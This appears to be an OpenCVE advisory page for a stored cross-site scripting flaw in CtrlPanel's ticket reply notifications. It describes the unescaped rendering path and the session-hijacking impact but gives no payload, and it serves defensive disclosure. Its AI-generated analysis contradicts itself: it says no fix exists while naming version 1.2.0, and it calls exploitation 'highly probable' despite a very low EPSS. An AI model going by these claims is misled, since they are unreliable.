Description
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0.
Published: 2026-05-19
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

This vulnerability is a stored cross‑site scripting flaw in the ticket reply notification system of CtrlPanel. Unsanitized reply content is written into the database and later rendered via Blade’s unescaped syntax, allowing an attacker to inject arbitrary JavaScript that executes in the victim’s browser session. The executed script can hijack administrative sessions, hijack credentials with fake prompts or keyloggers, and perform admin actions on behalf of the victim. The flaw exists in both admin‑to‑user and user‑to‑admin notifications and supports privilege escalation through session takeover.

Affected Systems

CtrlPanel Open‑Source billing software, version 1.1.1 and earlier. The affected components are the ticket reply notification classes for admins and users. Only installations that have not applied the 1.2.0 update remain vulnerable.

Risk and Exploitability

The CVSS score of 8.7 indicates a high impact with a low required skill level, as the attacker only needs to post a malicious reply that will later be rendered for recipients. The EPSS score is not available, but the vulnerability is listed as not condemned in the CISA KEV catalog, implying no known public exploitation. The likely attack vector is the web interface where tickets are replied to; from there the attacker’s payload is stored and later executed in the recipient’s browser when they view the notification. The low privilege requirement and the direct effect on session integrity make exploitation highly probable in targeted or opportunistic scenarios.

Generated by OpenCVE AI on May 19, 2026 at 22:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade CtrlPanel to version 1.2.0 or later.
  • If an upgrade is not possible, sanitize the reply content before storing it or escape it when rendering the notification payload.
  • Apply a Content Security Policy that disallows inline scripts and enforce HTTPS on all notification pages to reduce the risk of script execution.

Generated by OpenCVE AI on May 19, 2026 at 22:20 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 20 May 2026 14:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 20 May 2026 11:45:00 +0000

Type Values Removed Values Added
First Time appeared Ctrlpanel-gg
Ctrlpanel-gg panel
Vendors & Products Ctrlpanel-gg
Ctrlpanel-gg panel

Tue, 19 May 2026 21:30:00 +0000

Type Values Removed Values Added
Description CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0.
Title CtrlPanel: Stored XSS in Ticket Reply Notifications Allows Session Hijacking
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}

Subscriptions

Ctrlpanel-gg Panel
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-20T14:08:56.728Z

Reserved: 2026-03-26T16:22:29.034Z

Link: CVE-2026-34241

cve-icon Vulnrichment

Updated: 2026-05-20T14:08:47.529Z

cve-icon NVD

Status : Deferred

Published: 2026-05-19T22:16:37.297

Modified: 2026-05-20T16:16:25.253

Link: CVE-2026-34241

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-20T10:38:57Z

Weaknesses